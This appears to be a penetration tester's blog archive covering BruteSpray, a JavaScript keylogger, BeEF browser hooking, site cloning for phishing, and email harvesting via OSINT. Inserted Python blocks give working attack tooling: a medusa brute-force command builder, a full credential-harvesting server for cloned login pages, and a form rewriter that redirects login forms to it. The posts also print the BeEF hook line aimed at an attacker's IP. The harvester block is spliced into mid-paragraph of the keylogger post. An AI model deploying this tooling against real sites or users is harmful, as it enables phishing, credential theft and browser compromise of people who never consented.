<div class="separator" style="clear: both; text-align: center;">
<a href="https://camo.githubusercontent.com/261d824db889994a608b0ca3e4976deb607759b7/687474703a2f2f692e696d6775722e636f6d2f6b3942444235522e706e67" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="518" data-original-width="800" height="207" src="https://camo.githubusercontent.com/261d824db889994a608b0ca3e4976deb607759b7/687474703a2f2f692e696d6775722e636f6d2f6b3942444235522e706e67" width="320" /></a></div>
<br />
<br />
<h2 style="text-align: left;">
Source</h2>
<a href="https://github.com/x90skysn3k/brutespray">https://github.com/x90skysn3k/brutespray</a><br />
<h2 style="text-align: left;">
<br /></h2><span><a name='more'></a></span>
<h2 style="text-align: left;">
Author(s)</h2>
Shane Young/<a href="https://twitter.com/x90skysn3k">@x90skysn3k</a> & Jacob Robles/<a href="https://twitter.com/shellfail">@shellfail</a><br />
<h2 style="text-align: left;">
Description</h2>
<div>
BruteSpray is a Python script that takes <a href="https://nmap.org/">Nmap</a> gnmap/XML output as its input file and automatically starts brute-forcing the discovered services using <a href="https://github.com/jmk-foofus/medusa">Medusa</a>, either with its default credential lists or with username/password lists that you supply.<br />
<h2 style="text-align: left;">
License</h2>
<a href="https://github.com/x90skysn3k/brutespray/blob/master/LICENSE.md">MIT</a><br />
<h2 style="text-align: left;">
How to Install</h2>
On most Linux systems, the user will need to download the source from GitHub:</div>
<blockquote class="tr_bq">
<i>git clone https://github.com/x90skysn3k/brutespray.git</i></blockquote>
<div>
and then, from inside the cloned directory, install its Python dependencies:</div>
<div>
<blockquote class="tr_bq">
<i>pip install -r requirements.txt</i></blockquote>
On <a href="https://www.kali.org/">Kali Linux</a> it is much easier: simply install it from apt:<br />
<blockquote class="tr_bq">
<i>apt-get install brutespray </i></blockquote>
<h2 style="text-align: left;">
Sample Usage</h2>
As with most Linux tools, brutespray comes with the typical "-h" flag to display the help/usage:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieMGo6_diuKhs9KhTUm-OANNHIjKkfMXI4PVYbgLADTinSoeLikodfmsz443Q0kZC4ACMiiWDs8ACOg0P5_WvC1KFT8u4XtiewM5tGS04hIP5Kz8oCz5G3YMlgaG-TC4TMJ0m3oDKEu0M/s1600/brute_help.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1228" data-original-width="1338" height="293" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieMGo6_diuKhs9KhTUm-OANNHIjKkfMXI4PVYbgLADTinSoeLikodfmsz443Q0kZC4ACMiiWDs8ACOg0P5_WvC1KFT8u4XtiewM5tGS04hIP5Kz8oCz5G3YMlgaG-TC4TMJ0m3oDKEu0M/s320/brute_help.jpg" width="320" /></a></div>
<br />
That help output shows that the syntax for running brutespray is:<br />
<blockquote class="tr_bq">
<i>brutespray.py -f <input file> -t <# of threads> -T <# of simultaneous hosts> -u/-U <username/UsernameFile> -p/-P <password/PasswordFile> -c -i</i></blockquote>
</div>
<div>
Not all of those command line options are necessary. At the very minimum, the user will need to enter:</div>
<blockquote class="tr_bq">
<i>brutespray.py -f <input file></i></blockquote>
<div>
Beyond that minimal command, the user can add any of the other options as needed.</div>
<div>
Of the other command line options, the most interesting is the "-i" (interactive) flag. With this option, the user is prompted for all of the other information in a wizard-like manner:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibp8C0_aFJBBx_8fDKJozA6B6KzpSyVIRiRGM_G5Bb0UMwWR7OYPUs4m3q6GTTQLp9C-EOmu2yNcd03LRjrcurcbdMqw1YvfwTGoS-H5yhSjcGkiviySAFgtlGvaM_QkGZAVT-PRDzAAg/s1600/brute_wizard.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1096" data-original-width="1334" height="262" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibp8C0_aFJBBx_8fDKJozA6B6KzpSyVIRiRGM_G5Bb0UMwWR7OYPUs4m3q6GTTQLp9C-EOmu2yNcd03LRjrcurcbdMqw1YvfwTGoS-H5yhSjcGkiviySAFgtlGvaM_QkGZAVT-PRDzAAg/s320/brute_wizard.jpg" width="320" /></a></div>
<br /></div>
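<div>To see what BruteSpray does with the file given to -f, here is an added Python example of my own (it is not BruteSpray's or Medusa's code): it parses Nmap greppable output into open services, maps each Nmap service name onto the Medusa module that attacks it, and assembles the medusa command line for each target. The gnmap text is constructed for the example, and the service-to-module table is a reduced one I wrote for it; compare it against the module list from "medusa -d" on your own system.</div>

```python
import shlex
from collections import defaultdict

# Added example, not BruteSpray's own code. Reduced mapping of Nmap service
# names to Medusa module names; verify against `medusa -d` for your build.
SERVICE_TO_MODULE = {
    "ssh": "ssh",
    "ftp": "ftp",
    "telnet": "telnet",
    "vnc": "vnc",
    "mysql": "mysql",
    "postgresql": "postgres",
    "ms-sql-s": "mssql",
    "microsoft-ds": "smbnt",
    "netbios-ssn": "smbnt",
    "smtp": "smtp",
    "imap": "imap",
    "pop3": "pop3",
    "snmp": "snmp",
    "ms-wbt-server": "rdp",
}

# Constructed sample of `nmap -sV -oG` output (the format -f expects).
SAMPLE_GNMAP = (
    "# Nmap 7.80 scan initiated as: nmap -sV -oG scan.gnmap 192.168.1.0/24\n"
    "Host: 192.168.1.10 (db01.lab)\tStatus: Up\n"
    "Host: 192.168.1.10 (db01.lab)\tPorts: "
    "22/open/tcp//ssh//OpenSSH 7.4 (protocol 2.0)/, "
    "3306/open/tcp//mysql//MySQL 5.7.29/, "
    "445/open/tcp//microsoft-ds///, "
    "8080/filtered/tcp//http-proxy///\tIgnored State: closed (996)\n"
    "Host: 192.168.1.11 (fw.lab)\tPorts: "
    "22/open/tcp//ssh//Dropbear sshd/, 23/open/tcp//telnet///"
    "\tIgnored State: closed (998)\n"
)


def parse_gnmap(text):
    """Return one dict per *open* port: host, port, proto, service, version.

    Each gnmap 'Host:' line is tab-separated into 'Key: value' fields, and the
    Ports field lists entries as port/state/proto/owner/service/rpc/version/.
    """
    entries = []
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue  # comment and blank lines
        fields = dict(f.split(": ", 1) for f in line.split("\t") if ": " in f)
        if "Ports" not in fields:
            continue  # 'Status: Up' lines carry no port data
        host = fields["Host"].split()[0]  # IP only; drop the '(hostname)'
        for item in fields["Ports"].split(", "):
            parts = item.split("/")
            if len(parts) < 7 or parts[1] != "open":
                continue
            entries.append({
                "host": host,
                "port": int(parts[0]),
                "proto": parts[2],
                "service": parts[4],
                "version": parts[6],
            })
    return entries


def medusa_targets(entries):
    """Group (host, port) pairs by the Medusa module that can attack them."""
    targets = defaultdict(set)
    for e in entries:
        module = SERVICE_TO_MODULE.get(e["service"])
        if module:  # services Medusa has no module for are dropped
            targets[module].add((e["host"], e["port"]))
    return {m: sorted(t) for m, t in sorted(targets.items())}


def medusa_command(module, host, port, userfile="users.txt",
                   passfile="passwords.txt", threads=4):
    """Build the argv that would be handed to Medusa for one target.

    -U/-P are the username/password files, -t the parallel logins per host,
    and -f stops after the first valid credential is found on that host.
    """
    return ["medusa", "-h", host, "-n", str(port), "-M", module,
            "-U", userfile, "-P", passfile, "-t", str(threads), "-f"]


if __name__ == "__main__":
    for module, hosts in medusa_targets(parse_gnmap(SAMPLE_GNMAP)).items():
        for host, port in hosts:
            print(shlex.join(medusa_command(module, host, port)))
```

<div>BruteSpray runs Medusa for you; this only shows what -f consumes and what gets assembled per service. Before running either against a real target, check the account lockout policy: the thread and host counts limit concurrency, not attempts, and a password list sprayed at every discovered service is an easy way to lock out every account in a domain.</div>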
<div>
<h2 style="text-align: left;">
Video</h2>
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen="" class="YOUTUBE-iframe-video" data-thumbnail-src="https://i.ytimg.com/vi/jKGcNYj9D_Y/0.jpg" frameborder="0" height="266" src="https://www.youtube.com/embed/jKGcNYj9D_Y?feature=player_embedded" width="320"></iframe></div>
<br /></div>
</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-5789294398760146186.post-47485380375227552312018-01-16T01:24:00.002-05:002020-11-17T12:46:52.975-05:00A New Year<div dir="ltr" style="text-align: left;" trbidi="on">
Happy 2018!!!!<br />
<br />
Last year I wanted to try something new so I started the Pentest Fails Youtube series. It has been a blast. I enjoyed sharing the stories of both my fails as well as hearing other people share theirs.<br />
<br />
For this year I have a few new plans I would like to share with you.<br />
<div style="text-align: left;">
</div>
<ol>
<li>I will be continuing the Pentest Fails videos.</li>
<li>I will be starting a new video series where I demo and review various pentest tools.</li>
<li>I will be starting a new video series where I step through "Programming for Pentesters".</li>
</ol>
<br />
<div style="text-align: left;">
For the Pentest Fails videos, not much will be changing. I will still be sharing both my stories as well as stories other people have provided me. Of course, there may be a few guest storytellers showing up as well. However, I will be reducing the rate at which I release these videos to just once a month. This should allow me more time to prepare better videos and hopefully improve their overall quality and content.</div>
<br />
For the tool review and demo video series, I want to discuss and share the tools that I personally find useful or interesting. I will be creating new blog articles for each tool as well as showing how to install and execute the tool. Due to the nature of the tools, some videos may be shorter than others. I expect to be releasing about 2 new tool demo videos a month.<br />
<br />
Finally, the "Programming for Pentesters" video series. For this, I will be starting with a short introduction to programming and programming concepts followed by discussions of more advanced concepts. As it is the primary language I am currently coding in, most of the code shown in the videos will be written in Python. For the basic description of concepts or when I am roughing out a tool idea, I will be using pseudo-code as it is much more general and can better convey some concepts. Along with the basic videos in this series, I may also include some "Let's Code" videos where I show the process from concept to final tool for some program I am writing.<br />
<br />
Now being able to pull all of this off will not be an easy task for me, but I feel I can do it and it is a challenge I have set for myself for this year.<br />
<br />
In order to keep everything in line and on time, I am proposing the following schedule for videos:<br />
<div style="text-align: left;">
</div>
<ul>
<li>1st Monday of the Month => "Programming for Pentesters" (and "Let's Code")</li>
<li>2nd Monday of the Month => Tool Demo</li>
<li>3rd Monday of the Month => Pentest Fails</li>
<li>4th Monday of the Month => Tool Demo</li>
<li>5th Monday of the Month => ??? TBD</li>
</ul>
<br />
<div style="text-align: left;">
Now if a given month falls in such a way that it has a 5th Monday, then I will come up with some special content for it. That may take the form of some 1-off video or maybe just an extra of one of the other video series. It will really depend on what I feel like at that time.</div>
<br />
If a given month does NOT have a 4th Monday due to the way the weeks fall, then I will simply forgo the second Tool Demo video for that month.<br />
<br />
Hopefully, everyone enjoys the videos and I look forward to seeing everyone's comments.<br />
<br />
Thank you and have a great day.</div><span><a name='more'></a></span>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-5789294398760146186.post-78712662239404467572015-04-09T11:41:00.000-04:002020-11-17T12:47:02.331-05:00New Script/Tool: KeyLogging in JavaScript<div dir="ltr" style="text-align: left;" trbidi="on">So, you want to set up a keylogger within a website. Ultimately it is fairly simple: there are two items you will need. First, a way to log the keystrokes, and second, a way to capture them.<br /><br />For logging the keystrokes, the simplest way is a small script similar to the following one. This script accepts any GET or POST parameter and logs it to the specified file. Of course, this assumes that you have a place to host the script and that it has the permissions needed to create and write to that file.<br /><br /><script src="https://gist.github.com/tatanus/6e7fc6aaeca06d046dc1.js"></script><br />It should be noted that I have used a version of that logging script for numerous situations, mostly for social engineering. It works well for credential harvesting websites. It also is useful as a simple data exfiltration script.<br /><br />With that taken care of, we now need a way to capture the keystrokes. One of the simplest ways is demonstrated in the following code sample. This code, when included within a web page (with the proper surrounding "script" tags), captures every key pressed (as long as it is a printable character) and sends it off to the logging script.<br /><br /><script src="https://gist.github.com/tatanus/1ed7cf669f03643a80ad.js"></script><br />This simple key capture script has a few limitations. The primary one is that it only captures printable characters: key presses such as [Backspace], [Tab], [Enter], the arrow keys, and so on are not recorded, and the browser does not fire "onkeypress" for many of those keys at all. To account for these missing keys, it is important to listen not only for "onkeypress" but also for "onkeydown". 
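<div>Here is the logging half in Python, as an added example of my own: it is not the PHP gist above and not the author's code, and it also serves as the "log.php" target that clonesite.py and the site-cloning post rewrite forms to point at, since all three need the same thing, a script that records every GET or POST parameter it receives. The log file name, the redirect target and the sample requests are assumptions for the example; the HTTP handling uses only the standard library.</div>

```python
import json
import time
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urlsplit

# Added example, not the page's PHP gist. Both names below are assumptions.
LOG_FILE = "harvest.log"   # where one JSON line per request is appended
REDIRECT_TO = None         # e.g. the real login page; None answers 204 instead


def parse_params(method, path, body=b"", content_type=""):
    """Return (route, params) with query-string and body fields merged.

    Handles urlencoded forms (what a rewritten login form sends) and JSON
    bodies (what a keystroke script might POST). Repeated keys keep a list;
    anything else in a POST body is kept verbatim under "_raw".
    """
    parts = urlsplit(path)
    merged = dict(parse_qs(parts.query, keep_blank_values=True))
    kind = content_type.split(";")[0].strip().lower()
    if method == "POST" and body:
        if kind == "application/x-www-form-urlencoded":
            for k, v in parse_qs(body.decode("utf-8", "replace"),
                                 keep_blank_values=True).items():
                merged.setdefault(k, []).extend(v)
        elif kind == "application/json":
            try:
                data = json.loads(body)
            except ValueError:
                data = {"_raw": body.decode("utf-8", "replace")}
            for k, v in (data.items() if isinstance(data, dict) else []):
                merged.setdefault(k, []).append(v)
        else:
            merged.setdefault("_raw", []).append(body.decode("utf-8", "replace"))
    return parts.path, {k: v[0] if len(v) == 1 else v for k, v in merged.items()}


def log_record(method, path, client_ip, body=b"", content_type="", ts=None):
    """One JSON-serialisable record per request, timestamped in UTC."""
    route, params = parse_params(method, path, body, content_type)
    return {
        "ts": time.strftime("%Y-%m-%dT%H:%M:%SZ", time.gmtime(ts)),
        "client": client_ip,
        "method": method,
        "path": route,
        "params": params,
    }


class HarvestHandler(BaseHTTPRequestHandler):
    """Logs every GET or POST, whatever the path, then redirects or acks."""

    def _handle(self):
        length = int(self.headers.get("Content-Length") or 0)
        body = self.rfile.read(length) if length else b""
        rec = log_record(self.command, self.path, self.client_address[0],
                         body, self.headers.get("Content-Type", ""))
        with open(LOG_FILE, "a", encoding="utf-8") as fh:
            fh.write(json.dumps(rec) + "\n")
        if REDIRECT_TO:
            self.send_response(302)
            self.send_header("Location", REDIRECT_TO)
        else:
            self.send_response(204)  # silent ack, fine for keystroke beacons
        self.end_headers()

    do_GET = _handle
    do_POST = _handle

    def log_message(self, fmt, *args):
        pass  # keep the console quiet; the log file is the record


if __name__ == "__main__":
    HTTPServer(("0.0.0.0", 8080), HarvestHandler).serve_forever()
```

<div>Run it and point the capture script or the rewritten forms at http://your-host:8080/log.php (the path is ignored; every request is logged). Two practical points: prefer POST from the capture script, because parameters sent by GET also end up in the web server's access log and the victim's browser history; and treat harvest.log as the harvested credentials it is: keep it on the engagement host, restrict who can read it, and destroy it per the rules of engagement.</div>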
The following code takes this into account to provide a much more complete key capturing script.<br /><br /><script src="https://gist.github.com/tatanus/1d58b261099b927ad3b0.js"></script><br />Hopefully, you will find these scripts of use. As always, if you have any questions/comments/criticisms, please feel free to let me know.</div><span><a name='more'></a></span>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-5789294398760146186.post-84546160900508107722015-04-06T11:13:00.000-04:002020-11-17T12:47:32.769-05:00New Script/Tool: BeEF Restful API in python<div dir="ltr" style="text-align: left;" trbidi="on">The BeEF (Browser Exploitation Framework) Project is a penetration testing tool that is focused on attacking and exploiting web browsers. You can find out more information about the BeEF project at their <a href="http://beefproject.com/">website</a> as well as on their <a href="https://github.com/beefproject/beef">GitHub</a> page.<br /><br />How about a little more information on the tool? (Not all inclusive, just some high points.)<br /><ul style="text-align: left;"><li>BeEF is written in Ruby.</li><li>It is bundled with the <a href="https://www.kali.org/">Kali</a> Linux penetration testing distro by default.</li><li>It has a large number of modules that help in pulling information from, attacking, and exploiting a wide range of web browsers.</li><li>If properly configured, an attacker can launch Metasploit payloads directly from within BeEF.</li><li>BeEF has a RESTful API.</li><li>In order to make use of BeEF, an attacker only needs to start up BeEF and add one simple line of HTML to the target website.</li></ul><br />It is the last two items that make it of particular interest during a phishing exercise/engagement. 
The fact that all an attacker needs to do is add one HTML line (see below) to a website to make it work with BeEF is amazing.<br /><blockquote class="tr_bq"><i><b><script type=text/javascript src=http://127.0.0.1:3000/hook.js></script></b></i></blockquote>Combine this with the ability to control, monitor, and pull data from BeEF using its RESTful API, and you have a very powerful tool for automating various aspects of a phishing exercise/engagement.<br /><br />Unfortunately I could not find an implementation of the BeEF RESTful API for Python that I was happy with. That is why I wrote my own BeEF RESTful API Python module. It can be found on GitHub at <a href="https://github.com/tatanus/beefapi">https://github.com/tatanus/beefapi</a>. It does not incorporate all of the possible functions that the BeEF RESTful API allows for, but it does incorporate all of the ones I found useful.<br /><br />Please take a look and use it if you find it useful. If you have comments/criticisms/etc. with the code, please feel free to let me know.</div><span><a name='more'></a></span>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-5789294398760146186.post-61972269511721969462015-04-03T13:34:00.000-04:002020-11-17T12:47:43.661-05:00New Script/Tool: clonesite.py<div dir="ltr" style="text-align: left;" trbidi="on"><br />As mentioned in an earlier <a href="http://blog.seedsofepiphany.com/2015/04/phishing-101-cloning-site.html">post</a>, I decided to write my own site cloner tool for use in my phishing exercises/engagements. 
I needed a tool that would completely (or as close as I could get) clone any given site and then update any forms with links to a data collection script that I specify.<br /><br />The current version of the "Site Cloner" tool is hosted on GitHub at <a href="https://github.com/tatanus/PHISHING/blob/master/SCRIPTS/clonesite.py">https://github.com/tatanus/PHISHING/blob/master/SCRIPTS/clonesite.py</a><br /><br />In order to run the script, simply execute:<br /><blockquote class="tr_bq">python clonesite.py <URL> <outdirectory> (optional <form action>)<br />where:<br /> <URL> = the full URL of the page to be cloned<br /> <outdirectory> = the directory the files should be saved to<br /> <form action> = the script to execute when someone submits a form</blockquote>An example would be:<br /><blockquote class="tr_bq">python clonesite.py "http://www.safelogin.co" "safelogin" log.php </blockquote>This command line runs "clonesite.py" against the URL "http://www.safelogin.co", saves all files into the directory "./safelogin", and finally rewrites all forms to submit to a script called "log.php". That script (log.php) must then be created and stored in the same directory.<br /><br />When the script is run, you will see verbose output similar to the following:<br /><br /><script src="https://gist.github.com/tatanus/ef80ec3f5b369e4a92a8.js"></script> In this output you can see each page, link, file, and form that the script identifies and what it does with it. Some files (binary formats such as images) are simply downloaded, whereas HTML documents are processed for additional links and forms. 
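<div>The form rewrite that the verbose output reports as FOUND A FORM / REWROTE FORM can be reproduced with the standard library. The following is an added Python example of my own, not the clonesite.py code, and the sample page is constructed. It replaces the action of every form with a new target while copying every other tag, entity, comment and inline script through untouched, which matters because a cloned login page is usually a tangle of nested script and inline markup that a naive regex replacement would mangle.</div>

```python
import html
from html.parser import HTMLParser

# Added example, not clonesite.py's own code.


class FormRewriter(HTMLParser):
    """Stream HTML through unchanged except for the action of <form> tags."""

    def __init__(self, new_action):
        # convert_charrefs=False so entities like &copy; are passed through verbatim
        super().__init__(convert_charrefs=False)
        self.new_action = new_action
        self.out = []
        self.forms = []  # original action of every form seen (None if absent)

    def handle_starttag(self, tag, attrs):
        if tag != "form":
            self.out.append(self.get_starttag_text())  # verbatim copy
            return
        self.forms.append(dict(attrs).get("action"))
        kept = [(k, v) for k, v in attrs if k != "action"]  # method etc. stay
        kept.append(("action", self.new_action))
        rendered = " ".join(
            k if v is None else f'{k}="{html.escape(v, quote=True)}"'
            for k, v in kept
        )
        self.out.append(f"<form {rendered}>")

    def handle_startendtag(self, tag, attrs):
        self.out.append(self.get_starttag_text())  # <br/>, <img .../> verbatim

    def handle_endtag(self, tag):
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(data)  # text, plus raw <script>/<style> content

    def handle_entityref(self, name):
        self.out.append(f"&{name};")

    def handle_charref(self, name):
        self.out.append(f"&#{name};")

    def handle_comment(self, data):
        self.out.append(f"<!--{data}-->")

    def handle_decl(self, decl):
        self.out.append(f"<!{decl}>")

    def handle_pi(self, data):
        self.out.append(f"<?{data}>")


def rewrite_forms(page, new_action="log.php"):
    """Return (rewritten_html, [original actions]) for every form in page."""
    parser = FormRewriter(new_action)
    parser.feed(page)
    parser.close()
    return "".join(parser.out), parser.forms


# Constructed sample: a login page with one relative and one absolute-URL form.
SAMPLE_PAGE = """<!DOCTYPE html>
<html><head><title>Login &amp; Register</title>
<script>if (a < b) { go(); } // not a tag</script></head>
<body><!-- cloned -->
<form class="form-horizontal" action="/create.php" method="GET">
  <input name="user"><input type="password" name="pass"><input type="submit">
</form>
<form action="https://sso.example.test/auth" method="post"><input name="otp"></form>
<p>Copyright &copy; 2015</p></body></html>
"""

if __name__ == "__main__":
    rewritten, originals = rewrite_forms(SAMPLE_PAGE)
    for original in originals:
        print(f"REWROTE FORM ACTION {original!r} -> 'log.php'")
    print(rewritten)
```

<div>Forms with an absolute action on another host are rewritten the same way as relative ones, which is the case a hand edit most often misses. The method attribute is deliberately left alone, so the collecting script has to accept both GET and POST.</div>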
Anytime a form is encountered, the "form tag" is rewritten.<br /><blockquote class="tr_bq"><span style="font-size: x-small;">FOUND A FORM [<form class="form-horizontal" action="/create.php" method="GET">]<br />REWROTE FORM TO BE [<form method="get" action="log.php" class="form-horizontal">]</span></blockquote><div>As is shown in the above example, the form action was changed from "/create.php" to "log.php". Doing this automatically saves time and effort by not requiring the user to go back, find, and edit all of the forms themselves. Note that the method attribute is left alone, so a form that submits with GET will still deliver the captured values in the query string; this is why the logging script has to accept both GET and POST parameters, as the one below does.</div><br />Below is an example of what "log.php" could look like:<br /><br /><script src="https://gist.github.com/tatanus/6e7fc6aaeca06d046dc1.js"></script> I hope this script is of use to you. As always, if you have any comments/criticisms, etc., please leave a comment below.</div><span><a name='more'></a></span>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-5789294398760146186.post-35178176023918572562015-04-02T16:05:00.000-04:002020-11-17T12:47:53.701-05:00Phishing 101: Cloning a Site<div dir="ltr" style="text-align: left;" trbidi="on">Many phishing exercises/engagements require both sending a malicious email and hosting a malicious website/web server. This is definitely the case when the goal is to collect credentials or to exploit the user's web browser.<br /><br />Before we get into crafting and sending emails, we need to make a malicious website. There are a few ways to go about this.<br /><br /><h2 style="text-align: left;">Browser Exploitation</h2>First, you could create a dummy site that just has some malicious code in it; the site does not really need to display anything to the user. This is common with browser attacks. One example of this is when using the BeEF (Browser Exploitation Framework) project.<br /><br />The BeEF Project is a penetration testing tool that is focused on attacking and exploiting web browsers. 
You can find out more information about the BeEF project at their <a href="http://beefproject.com/">website</a> as well as on their <a href="https://github.com/beefproject/beef">GitHub</a> page.<br /><br />If you take this approach, BeEF makes it very easy: once you have BeEF running, you create a web page that contains a line similar to:<br /><blockquote class="tr_bq"><b><i><script type=text/javascript src=http://127.0.0.1:3000/hook.js></script></i></b></blockquote>Replace "127.0.0.1" with the IP of the Internet-facing system that BeEF is running on, then send the target an email instructing them to visit the page you inserted that line into. Once the target visits it, their browser is hooked into BeEF and its modules can be run against it.<br /><br /><h2 style="text-align: left;">Information/Credential Harvesting</h2>Now for the second type of malicious website. This type is a site that looks as close to 100% valid as possible and will likely be used to capture credentials or other important information such as usernames, passwords, RSA tokens, etc.<br /><br />To make such a site, you can:<br /><ul style="text-align: left;"><li>use "wget" to clone an existing site, then edit it</li><li>make it entirely by hand</li><li>use a dedicated site-cloning tool and then edit the results</li></ul><br />If you wish to use "wget" to clone a site, the following options will come in handy.<br /><ul><li>perform a full clone:</li><ul><li>wget -m -p -k <URL></li><ul><li>-m = Mirroring: turns on recursion and time-stamping and sets infinite recursion depth.</li><li>-p = Page Requisites: causes wget to download all the files that are necessary to properly display a given HTML page.</li><li>-k = After the download is complete, convert the links in the documents to make them suitable for local viewing.</li></ul></ul><li>only clone X levels deep:</li><ul><li>wget -r -l 1 -p -k <URL>
</li><ul><li>-r = Enable recursion</li><li>-l X = Limit recursion to X levels deep</li><li>-p = Page Requisites: downloads all the files that are necessary to properly display a given HTML page.</li><li>-k = After the download is complete, convert the links in the documents to make them suitable for local viewing.</li></ul></ul></ul><br />You may ask why you would not always want to do a full clone. Well, if you only want to capture the values entered into a particular form, you need to clone only that page, not the rest of the site. In either case, if the page loads scripts or stylesheets from another host (a CDN, for example), add -H (span hosts), or wget will skip those requisites and the clone will not render like the original.<br /><br />Now that you have cloned the site (or as much of it as you need), you will need to edit the HTML and change the forms so that their submissions reach you. This is also the time to make any other edits you desire. When editing forms, it is useful to have a secondary script handy that can be used as the "action" for the form. The code sample below is a simple PHP script that logs all GET and POST parameters passed to it.<br /><br /><script src="https://gist.github.com/tatanus/6e7fc6aaeca06d046dc1.js"></script> When creating a web site by hand, you can get a bit of a head start by opening the page you want to clone, choosing "view source", selecting it all, and copy-pasting it into a new HTML document. Then, as before, you will need to make any necessary changes to the HTML.<br /><br />There are also a few tools available to help, such as <a href="https://www.httrack.com/">HTTrack</a>. According to the website,<br /><blockquote class="tr_bq"><i>[HTTrack] allows you to download a World Wide Web site from the Internet to a local directory, building recursively all directories, getting HTML, images, and other files from the server to your computer. HTTrack arranges the original site's relative link-structure. 
Simply open a page of the "mirrored" website in your browser, and you can browse the site from link to link, as if you were viewing it online. HTTrack can also update an existing mirrored site, and resume interrupted downloads. HTTrack is fully configurable, and has an integrated help system.</i></blockquote>Again, as before, you will need to make any necessary changes to the HTML.<br /><br />Finally, I would like to mention a script I wrote that can be used to help with cloning a site and automatically making any necessary edits to the contained forms. The script can be found at <a href="https://github.com/tatanus/PHISHING/blob/master/SCRIPTS/clonesite.py">https://github.com/tatanus/PHISHING/blob/master/SCRIPTS/clonesite.py</a>. I will be releasing a new blog post describing the details of this script in the next few days.<br /><br /></div><span><a name='more'></a></span>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-5789294398760146186.post-12732449981214296912015-04-01T09:09:00.000-04:002020-11-17T12:48:00.796-05:00New Script/Tool: Email Address Finder<div dir="ltr" style="text-align: left;" trbidi="on"><br />While performing various phishing exercises/engagements, I found myself having to identify lists of potential email addresses on a regular basis. Tools like "theHarvester" make this task easier; however, theHarvester does not just find email addresses. It also finds associated host names, and while it does search a large number of search engines, it did not search all of the ones I thought it should.<br /><br />As a result, I ended up writing my own minimal script to search for email addresses across all of the search engines I could think of at the time. 
The tool currently searches for email addresses from eight different search engine sources:<br /><br /><ul style="text-align: left;"><li>google</li><li>bing</li><li>ask</li><li>dogpile</li><li>yandex</li><li>baidu</li><li>yahoo</li><li>duckduckgo</li></ul>Simply run:<br /><blockquote class="tr_bq" style="text-align: left;"><b>python find_emails.py <target domain></b></blockquote>and it will start querying each of the above listed search engines for records that match<br /><blockquote class="tr_bq"><b>@<target domain></b></blockquote>and then parse the resulting output for strings that match the email regex of<br /><blockquote class="tr_bq"><b>[a-zA-Z0-9\.\-_]+@[a-zA-Z0-9\.\-]*</b> + <b><target domain></b></blockquote>Once the regex has been applied, all of the identified email addresses are added to a list and deduplicated to produce the final list of potential email addresses. Note that because the domain part of that regex is not anchored on either side, it also matches addresses such as user@notexample.com or user@example.com.au; review the list for those, or tighten the pattern, before using it as a target list.<br /><br />I fully admit that this code is not new or unique, but I wrote it to suit my needs and if you find it useful as well, then please let me know. If you have suggested improvements, find errors, etc., please let me know as well.<br /><br />You can find this code located at: <a href="https://github.com/tatanus/PHISHING/blob/master/SCRIPTS/find_emails.py">https://github.com/tatanus/PHISHING/blob/master/SCRIPTS/find_emails.py</a></div><span><a name='more'></a></span>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-5789294398760146186.post-64012530763791273712015-03-31T16:38:00.000-04:002020-11-17T12:48:07.297-05:00Phishing 101: Target Identification / OSINT<div dir="ltr" style="text-align: left;" trbidi="on">When a new phishing exercise/engagement begins, among the first items that need to be collected is a list of target email addresses. This is typically handled in one of two ways (or, in some cases, a combination of them).<br /><br /><ol style="text-align: left;"><li>The customer provides a list of email addresses that are to be targeted. 
All phishing emails MUST be sent to one of the email addresses in the list.</li><li>The attacker (you) must do your own research to identify potential email targets.</li></ol><br />As the first way (the customer provides the target list) is a bit boring to discuss here, we will be focusing on the second: finding your own targets. This type of internet recon is typically referred to as OSINT (<b>O</b>pen <b>S</b>ource <b>Int</b>elligence). As I covered a bit of OSINT in a <a href="http://blog.seedsofepiphany.com/2013/10/internet-footprinting-aka-osint-open.html">previous post</a>, I will review it here and add additional information as needed.<br /><br />In your attempts to identify potential email targets for the phishing exercise/engagement, you will find that there are many resources (websites and tools) that can aid you in your research/intelligence gathering. Some of the common websites I find useful for identifying email addresses are:<br /><ul style="text-align: left;"><li>Web Search Engines (examples include:)</li><ul><li><a href="https://www.google.com/">Google</a></li><li><a href="https://www.bing.com/">Bing</a></li></ul><li>Social Media (examples include:)</li><ul><li><a href="https://twitter.com/">Twitter</a></li><li><a href="https://www.facebook.com/">Facebook</a></li><li><a href="https://www.linkedin.com/">LinkedIn</a></li></ul></ul>Google, Bing, and other search engines can be a great asset in identifying email addresses. Simply by searching for <b><i>"@<targetdomain.com>"</i></b> you should get a list of links that each contain an email address in the displayed description. Then, by simply copy-and-pasting the email addresses into a targets file, you can start building your list. Please note that tools like "theHarvester", mentioned later, can do this for you.<br /><br />Social media sites are ripe with useful information. Most of them have a way to search for people who say they work for a particular company. 
